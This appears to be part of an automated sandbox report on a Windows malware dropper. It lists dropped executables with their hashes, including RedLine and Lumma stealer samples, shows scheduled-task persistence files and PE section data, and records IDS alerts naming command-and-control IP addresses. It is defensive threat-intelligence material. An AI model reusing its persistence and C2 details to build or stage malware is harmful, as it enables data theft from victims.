                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....&.f................................. ........@.. .......................@............`.....................................W............................ ......|................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H..........................................................................h7....c73..w..V)J.:..a.W'.=.|...Q&.....p....IIoO...g...Q...P.~CM...v@.P*..Sl....a=..:u?ED."..Jp....2..r.B..H...?.v..0]2.....>..F.}.s6..N...h.#.....Z.6..g^gu.aW&.2.n?.v..*.S...}.!.^..E.h.dp.....fc4{../O..I....v.Q,U...>xK..c.D.../..E7...T...t......y...f..SC....).F.m."2...Ms.3"KL.e..zc.Bb.-.l.\......TYQ..B!.......?.......e]4...../(5......5...4.......'.[.g$.....gb;e..Q..r.Ge(a<..qC.J

                                                      C:\Users\user\AppData\Local\Temp\1000308001\4d72d15151.exe

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):1835520
                                                      Entropy (8bit):7.947999914727406
                                                      Encrypted:false
                                                      SSDEEP:49152:uVu2EnPTm/0lKfYfhA93aTyjg7dasLOzGvVtfjdRCjp:h2+Tm/mKBVgysDiz
                                                      MD5:D512CD419C532FC7D6C3A5C6C4A303A3
                                                      SHA1:3EA05F000AD46070D41E449B3F1B7419144D98FF
                                                      SHA-256:D1DC3ECA3C7794FEE2EF250E63D99101AAAE555751AB83EEFA9F8952A7F2C7D9
                                                      SHA-512:C92C15990C12770D75310B8EE32181CE165348C898CB8665AFD28BE7E4224F0876BA7AAB2667246E393C90AD3FACAB79FD03B4876D5B086D436D52188954C448
                                                      Malicious:true
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........C..............X......m.......Y.......p.....y.........`...............\......n.....Rich............PE..L.../..f......................$......pi...........@...........................i.....6D....@.................................P.%.d.............................%..................................................................................... . ..%......(..................@....rsrc ......%......8..............@....idata ......%......8..............@... ..)...%......:..............@...fcorzhao......O......<..............@...ykxfeacd.....`i.....................@....taggant.0...pi.."..................@...................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):360448
                                                      Entropy (8bit):6.667690093536603
                                                      Encrypted:false
                                                      SSDEEP:6144:yEIbJdhhk012D9kEsrwRdvwoShfvM4MH0RoeAcGho33vXvIKgI5TdFaA51TIrxLD:yEIbJvhk0azddWtyA51C09ssEN8mhGfp
                                                      MD5:2F1D09F64218FFFE7243A8B44345B27E
                                                      SHA1:72553E1B3A759C17F54E7B568F39B3F8F1B1CDBE
                                                      SHA-256:4A553C39728410EB0EBD5E530FC47EF1BDF4B11848A69889E8301974FC26CDE2
                                                      SHA-512:5871E2925CA8375F3C3CE368C05EB67796E1FBEC80649D3CC9C39B57EE33F46476D38D3EA8335E2F5518C79F27411A568209F9F6EF38A56650C7436BBAA3F909
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 58%
                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...<..f..........................................@..........................@............@.....................................x................................H...................................................................................text.............................. ..`.rdata...).......*..................@..@.data...X........^..................@....reloc...H.......J...6..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Temp\1000318001\66ed86be077bb_12.exe

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):10796768
                                                      Entropy (8bit):7.884437457246237
                                                      Encrypted:false
                                                      SSDEEP:196608:I7A71NIOC732QZMymBHd+3WGeFdJJMGHPP/CPZ5za/+qKcDxNY5fv7RFHnTKm:IA5NIOC73RdmB9+ReFV/m5zQAfHHTF
                                                      MD5:489F9C4FC0AFA8D1BE37BC5E2F57833B
                                                      SHA1:C2BAC602A73C19B345B64E0B7CF2F837BE307B61
                                                      SHA-256:D9DBFBC8294CBF6A32D43413ED328594EE058D7356C26EB5CD196F9F4867C078
                                                      SHA-512:7F43D972F58A025D09143C57351221FE7B10C1756A0C5578AC42698C21EA05986D4BBC0C7FF4BE339C2D0930B505E4F4DDA53C0800D84B059A21BE938ADB678E
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 71%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...].g...................N...T.....~.O.. ... O...@.. .......................`......e)....@.................................0.O.K....@O.V.T.................@........O.............................................. ............... ..H............text.....N.. ....N................. ..`.sdata....... O.......N.............@....rsrc...V.T..@O...T...O.............@..@.reloc.......@.....................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Temp\1000321001\2.exe

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):6679627
                                                      Entropy (8bit):6.628951125972036
                                                      Encrypted:false
                                                      SSDEEP:98304:Wa0mgFKceo820M9AooDDyBRU8+boh3ruUNsc9Ql7JtdLrH:Wa0mgFKceo8vMoD2BRGwuUNnQzrH
                                                      MD5:F66BEEE3AAE7CD92F02270A910B70231
                                                      SHA1:F8F1CE1DDE9118E6D40426256756A201BE9B0F65
                                                      SHA-256:A89687D296782DB168A92A496FB865D481666CF53588684F69ECAC509711DA16
                                                      SHA-512:635B89682A25F6C64D4AF69D6AFEBCA753E6B0595EDF5585231E7DAA53778CECCD24D36783026E9785245CC9D14AEBAF2FA4CA179F5EAEFBD966A92140790480
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 61%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....0.f.L_..&.........#..G...Z...f...........H...@...................................f....... .........................B........................................)............................H......................................................text.....G.......G.................`.P`.data.........H.......G.............@.`..rdata....... H.......H.............@.`@/4............H.......H.............@.0@.bss......f...L.......................`..edata..B............jL.............@.0@.idata...............lL.............@.0..CRT....4............vL.............@.0..tls.................xL.............@.0..reloc...).......*...zL.............@.0B/14...................Z.............@..B/29..................Z.............@..B/41.....XL.......N...T\.............@..B/55.....B.............\.............@..B/67.....T.............].............@.0B/80.....a.............].

                                                      C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):311296
                                                      Entropy (8bit):5.082545442352462
                                                      Encrypted:false
                                                      SSDEEP:3072:Eq6EgY6iArUjOvWUJwPYT8QADFKoRJTA+tJSiK1cZqf7D34leqiOLibBOT:vqY6iULwP/xnRJTAKJ81cZqf7DIvL
                                                      MD5:58E8B2EB19704C5A59350D4FF92E5AB6
                                                      SHA1:171FC96DDA05E7D275EC42840746258217D9CAF0
                                                      SHA-256:07D4B7768E13D79AC5F05F81167B29BB6FBF97828A289D8D11EEC38939846834
                                                      SHA-512:E7655762C5F2D10EC246D11F82D437A2717AD05BE847B5E0FD055E3241CAACA85430F424055B343E3A44C90D76A0BA07A6913C2208F374F59B61F8AA4477889F
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe, Author: Joe Security
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 88%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0................. ... ....@.. ....................... ............@.....................................O.... ..............................h................................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Temp\1000340001\Blenar.exe

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):5492542
                                                      Entropy (8bit):7.933542408650758
                                                      Encrypted:false
                                                      SSDEEP:98304:MVZklJQyhAl9gN4sldQzfC6lmzlt6yvi0WcHlPLeqNZ8hY/bUZqTxQeeBxZAsSHf:S0vOl5zqv/6H0XlPKQ8hY/b0qlteXqsF
                                                      MD5:E277DBB7AFA4631D4ABCEF9183671836
                                                      SHA1:71EF01646FA13B0A49550283D5BE12539526C724
                                                      SHA-256:3A72E66E73B857A6E2E004CFA4E6EF4EFA872AEDF7941E94637BF74B5591DEB3
                                                      SHA-512:E9DE17DB72EF4DB18615E411823A2D6A3BB8AB870B508DEFCCA8045F75C1D89F52EF7F3A9B1BC957DAD1311EF0BFB2F1A0D411F82FA3F596F1FEFB6B48F8B770
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......].N... ... ... ..m... ..m... ..m... .".#... .".%... .".$... ...... ...!.m. ...$... ...... ..."... .Rich.. .................PE..L......^.........."..........^.......|............@.................................P.T...@.....................................d.......)....................p.........................................@............................................text............................... ..`.rdata..............................@..@.data...............................@....gfids..............................@..@.rsrc...)...........................@..@.reloc.......p.......\..............@..B................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):1873408
                                                      Entropy (8bit):7.95067200947208
                                                      Encrypted:false
                                                      SSDEEP:49152:4LdLkHiRDkiklbNk5/z73WRWilUyAuioc38Dz:4xL0v6/HiWinMx3
                                                      MD5:6A6234CE6830B57E0F1FA2E728E7E8D1
                                                      SHA1:92D0E6AEBA51AEB9D79196D06BE442768F1A78C9
                                                      SHA-256:EDC95E00991BBD33CEB4CB2CFD88AA714011ED69296EC62CC40C0BE6C83450F3
                                                      SHA-512:926ECA735E4B3EAC6CD6F178CE98721D50FC4F3AA8FD9BF49332C9D58B14CEB12FFB0BB029FB1162F771B8AD76D6C35F58B2AB4F99B77D5C81A29A55A2E7C50F
                                                      Malicious:true
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f.............................`J...........@...........................J......>....@.................................W...k............................JJ..............................IJ..................................................... . ............................@....rsrc...............................@....idata ............................@... . *.........................@...qnrefdmv......0..|..................@...gekfttam.....PJ......p..............@....taggant.0...`J.."...t..............@...........................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Temp\Tmp1F00.tmp

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):2662
                                                      Entropy (8bit):7.8230547059446645
                                                      Encrypted:false
                                                      SSDEEP:48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
                                                      MD5:1420D30F964EAC2C85B2CCFE968EEBCE
                                                      SHA1:BDF9A6876578A3E38079C4F8CF5D6C79687AD750
                                                      SHA-256:F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
                                                      SHA-512:6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
                                                      Malicious:false
                                                      Preview:0..b...0.."..*.H..............0...0.....*.H..............0...0.....*.H............0...0...*.H.......0...p.,|.(.............mW.....$|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%..*.X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...|B.d..kr.=G.g.v..f.d.C.?..*.0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

                                                      C:\Users\user\AppData\Local\Temp\Tmp1F11.tmp

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):2662
                                                      Entropy (8bit):7.8230547059446645
                                                      Encrypted:false
                                                      SSDEEP:48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
                                                      MD5:1420D30F964EAC2C85B2CCFE968EEBCE
                                                      SHA1:BDF9A6876578A3E38079C4F8CF5D6C79687AD750
                                                      SHA-256:F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
                                                      SHA-512:6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
                                                      Malicious:false
                                                      Preview:0..b...0.."..*.H..............0...0.....*.H..............0...0.....*.H............0...0...*.H.......0...p.,|.(.............mW.....$|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%..*.X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...|B.d..kr.=G.g.v..f.d.C.?..*.0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

                                                      C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

                                                      Download File
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):1936896
                                                      Entropy (8bit):7.951005348873534
                                                      Encrypted:false
                                                      SSDEEP:49152:UFUzI1/+kp2sID/l8KmuQQHur5j2IZxEmtyeeu:b8V+kksIp8X7QEKWeu
                                                      MD5:604496F01BE7B778D8A564C57677D644
                                                      SHA1:B3A7781E8A94CADB2450C4A3DF11B4A2E94EF82C
                                                      SHA-256:AD1E3F88D7D1C29836570F13B8B540DFDACA9434B9F47170B00CF54519C5EDCC
                                                      SHA-512:62B720AFCEFBF8BA96698D428859466DCCD83E03440E06C2264557185CE415B18240DFAED46065CF2775D8F890F112AE2E5D88910B19166FA001C67E671426FC
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 47%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................L...........@...........................L.....S.....@.................................W...k...........................l.L...............................L..................................................... . ............................@....rsrc...............................@....idata ............................@... .`+.........................@...nkxohnek......2..t..................@...drssptxt......L......h..............@....taggant.0....L.."...l..............@...................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe:Zone.Identifier

                                                      Download File
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:modified
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:true
                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                      C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\76b53b3ec448f7ccdda2063b15d2bfc3_9e146be9-c76a-4720-bcdb-53011b87bd06

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):2251
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3::
                                                      MD5:0158FE9CEAD91D1B027B795984737614
                                                      SHA1:B41A11F909A7BDF1115088790A5680AC4E23031B
                                                      SHA-256:513257326E783A862909A2A0F0941D6FF899C403E104FBD1DBC10443C41D9F9A
                                                      SHA-512:C48A55CC7A92CEFCEFE5FB2382CCD8EF651FC8E0885E88A256CD2F5D83B824B7D910F755180B29ECCB54D9361D6AF82F9CC741BD7E6752122949B657DA973676
                                                      Malicious:false
                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Windows\Tasks\axplong.job

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):308
                                                      Entropy (8bit):3.5318333830177417
                                                      Encrypted:false
                                                      SSDEEP:6:dSnUgZX2JUEZ+lX1lOJUPelkDdtcVAkXIEZ8MlW8+y0lbfk0ut0:dSnUgl2JQ1lOmeeDhkXd8kX+V5ut0
                                                      MD5:CAD1F39045AF33AF190A8DEDAD41EC64
                                                      SHA1:4AF6C910C70724586173BABF1FEE261902EC2DE1
                                                      SHA-256:AD00A55C37D251A196E706DF7DC827DCCE65A0175BA1C3ED45F4AEEB46A12B25
                                                      SHA-512:202E015771EF2AC8418B051C477378723583FE97CCA373C4946B9834B5175160C1BD46091DC10BAB15D94652FB3A60A9038DB38B39CF3488A8CF13052395CA8C
                                                      Malicious:false
                                                      Preview:.....d....B......l&F.......<... .....s.......... ....................<.C.:.\.U.s.e.r.s.\.F.R.O.N.T.D.~.1.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........F.R.O.N.T.D.E.S.K.-.P.C.\.f.r.o.n.t.d.e.s.k...................0.................".@3P.........................

                                                      C:\Windows\Tasks\skotes.job

                                                      Download File
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):306
                                                      Entropy (8bit):3.470551422688948
                                                      Encrypted:false
                                                      SSDEEP:6:/QMvqDZXUKJUEZ+lX1CGdKUe6tcVAkXIEZ8MlW8+y0lbfLut0:hulvJQ1CGAFMkXd8kX+V/ut0
                                                      MD5:2BC48F23185FB168CCF2EE8D2836376E
                                                      SHA1:E66AA2AACEC5A37B51AA3DBCCD681A08B890D597
                                                      SHA-256:84645A8DEAEE4DC12DCC2B9DFCA6C559463D8F4F1F0878DE9A9A03EE9DBBFB58
                                                      SHA-512:F11477A9B473A38145A24D121711044CD3790C83EE8BF590B000EFC295089C1983B4815B785DB1B724570358D816A8D8C5FC3D229D4759A0D31ADB6CAF19E1C2
                                                      Malicious:false
                                                      Preview:....a...4D.M..-7x..lF.......<... .....s.......... ....................;.C.:.\.U.s.e.r.s.\.F.R.O.N.T.D.~.1.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........F.R.O.N.T.D.E.S.K.-.P.C.\.f.r.o.n.t.d.e.s.k...................0.................".@3P.........................

                                                      C:\Windows\appcompat\Programs\Amcache.hve

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:MS Windows registry file, NT/2000 or above
                                                      Category:dropped
                                                      Size (bytes):1835008
                                                      Entropy (8bit):4.419419583028464
                                                      Encrypted:false
                                                      SSDEEP:6144:ucifpi6ceLPL9skLmb0mYSWSPtaJG8nAgex285i2MMhA20X4WABlGuNx5+qs:7i58YSWIZBk2MM6AFBLoqs
                                                      MD5:CF3E370EC892A13DFA9AB471F1C36F49
                                                      SHA1:B6FBAA3285851A4FFCE080F7C7C3A97211036DCF
                                                      SHA-256:A1BD9863D044A00D712262D9E9ED8F307AB785531569F845868092117D8F0597
                                                      SHA-512:109200C564D3496F5D0AB17046CB2E08D590E7A2561DD818F1E11AB3C50E56D2001A96922A79D1E4647E8C112CA61C6FD8F5D723A96CD059E20C95E8E6C4FEE9
                                                      Malicious:false
                                                      Preview:regfF...F....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmJ.O.................................................................................................................................................................................................................................................................................................................................................{ZX*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Entropy (8bit):7.951005348873534
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:file.exe
                                                      File size:1'936'896 bytes
                                                      MD5:604496f01be7b778d8a564c57677d644
                                                      SHA1:b3a7781e8a94cadb2450c4a3df11b4a2e94ef82c
                                                      SHA256:ad1e3f88d7d1c29836570f13b8b540dfdaca9434b9f47170b00cf54519c5edcc
                                                      SHA512:62b720afcefbf8ba96698d428859466dccd83e03440e06c2264557185ce415b18240dfaed46065cf2775d8f890f112ae2e5d88910b19166fa001c67e671426fc
                                                      SSDEEP:49152:UFUzI1/+kp2sID/l8KmuQQHur5j2IZxEmtyeeu:b8V+kksIp8X7QEKWeu
                                                      TLSH:A795335B8AF7A5D1CC623B32592BCB153A289161A297730B3795063FF03FA994EC50D3
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................

                                                      File Icon

                                                      Icon Hash:00928e8e8686b000

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x8ca000
                                                      Entrypoint Section:.taggant
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:6
                                                      OS Version Minor:0
                                                      File Version Major:6
                                                      File Version Minor:0
                                                      Subsystem Version Major:6
                                                      Subsystem Version Minor:0
                                                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                      Entrypoint Preview

                                                      Instruction
                                                      jmp 00007F4B90C0665Ah

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x1e0.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x4c826c0x10nkxohnek
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x4c821c0x18nkxohnek
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      0x10000x680000x2de0060ab7869aa6f7228ae51c5f9dbe1447bFalse0.998073484332425data7.982641711189707IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .rsrc0x690000x1e00x200887e96da26ae315dba89beee28d99895False0.576171875data4.535075806601817IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      0x6b0000x2b60000x200a16d87dcd5288583e30e04abe99d9568unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      nkxohnek0x3210000x1a80000x1a740071296aa10e5fc6a03fe6b8295d617244False0.9944936410956882data7.953823653253661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      drssptxt0x4c90000x10000x4002f428e7f5f93e3999201d2d664e9d133False0.8388671875data6.386465883010667IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .taggant0x4ca0000x30000x220000f8b21fe4b6b286b003f3c64f4cc041False0.06261488970588236DOS executable (COM)0.7744092416434756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                      Resources

                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_MANIFEST0x4c827c0x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                      Imports

                                                      DLLImport
                                                      kernel32.dlllstrcpy

                                                      Possible Origin

                                                      Language of compilation systemCountry where language is spokenMap
                                                      EnglishUnited States

                                                      Network Behavior

                                                      Suricata IDS Alerts

                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                      2024-09-24T15:33:38.681360+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.749924185.215.113.6715206TCP
                                                      2024-09-24T15:33:38.681360+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749714185.215.113.10380TCP
                                                      2024-09-24T15:33:38.681360+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749812185.215.113.2680TCP
                                                      2024-09-24T15:33:38.681360+02002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.749833185.215.113.1680TCP
                                                      2024-09-24T15:33:38.681360+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749872185.215.113.1680TCP
